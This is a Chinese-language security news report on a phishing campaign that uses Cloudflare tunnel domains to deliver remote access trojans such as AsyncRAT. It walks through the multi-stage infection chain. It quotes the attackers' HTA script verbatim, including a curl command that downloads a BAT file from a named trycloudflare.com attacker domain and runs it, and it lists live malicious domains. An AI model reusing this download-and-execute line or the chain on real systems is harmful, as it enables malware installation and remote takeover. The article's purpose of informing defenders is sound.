网络安全专家发现了一场复杂的攻击活动,攻击者利用 Cloudflare 的隧道基础设施来分发各种远程访问木马(RAT)。
自 2024 年 2 月以来,这一基础设施展现出了极强的韧性,它被用作恶意文件和木马的分发平台,使攻击者能够未经授权访问受害者的系统。
包括 Forcepoint、Fortinet、Orange 和 Proofpoint 在内的安全厂商已记录下这一持续存在的威胁,并强调了其不断演变的特性以及对全球各组织日益增长的影响。
主要的感染途径始于具有欺骗性的网络钓鱼电子邮件,其中包含伪装成发票或订单的恶意附件。
这些电子邮件通常制造虚假的紧迫感,可能还包含伪造的对话线程和回复,以使邮件看起来合法。
附件通常使用 “application/windows-library+xml” 文件格式,与二进制文件相比,这种文件格式看似无害,因此常常能够绕过电子邮件安全网关。
当打开该文件时,它会与托管在 Cloudflare 隧道基础设施上的远程 WebDav 资源建立连接。
Sekoia 威胁检测与研究(TDR)团队的分析师一直在监测这一攻击基础设施,其内部将其称为 “利用 Cloudflare 隧道基础设施分发多种远程访问木马”。
他们的分析揭示了一个复杂的多阶段感染链,该感染链采用了多种混淆技术来逃避检测系统。
即使在 2025 年,此次攻击的复杂性也表明了威胁行为者如何持续开发创新方法来绕过现代安全控制措施。
攻击者利用以 “trycloudflare.com” 为后缀的域名,包括 “malawi-light-pill-bolt.trycloudflare.com”、“players-time-corresponding-th.trycloudflare.com” 等,来托管他们的恶意内容。
这一基础设施传送有效载荷,最终在被攻陷的系统上建立持久的远程访问权限,这可能导致数据被盗取,以及网络遭到进一步破坏。
感染链机制
感染过程始于用户与伪装成 PDF 文档的 LNK 文件进行交互。
这个快捷方式并不会打开合法文档,而是从同一远程服务器执行一个 HTA 文件。HTA 文件的内容揭示了攻击的进展过程:
Set oShell = CreateObject(“WScript.Shell”)
oShell.Run “cmd.exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat”, 0, false
self.Close
这段脚本会触发一个 BAT 文件,该文件会安装 Python 并执行经过混淆处理的 Python 代码,然后将下一阶段的有效载荷注入到 “notepad.exe” 进程中。
为了实现持久化,恶意软件会在 Windows 启动文件夹中放置两个 VBS 文件和另一个 BAT 文件来创建启动项。
最后一个阶段使用 PowerShell 反射性地加载从带有嵌入式 base64 编码有效载荷的 JPEG 图像中下载的有效载荷。
这就建立了远程访问木马(RAT)与它的命令控制服务器之间的连接,通常会使用像 “duckdns.org” 这样的动态 DNS 服务进行通信。
感染链通过涉及 Windows 库文件、LNK 文件、HTA 执行和 Python 注入的复杂多阶段过程来分发 AsyncRAT。
这场攻击活动的演变表明,威胁行为者在不断调整他们的技术以绕过安全控制,这凸显了采用多层检测方法以及持续监测类似攻击模式的重要性。
发表评论
您还未登录,请先登录。
登录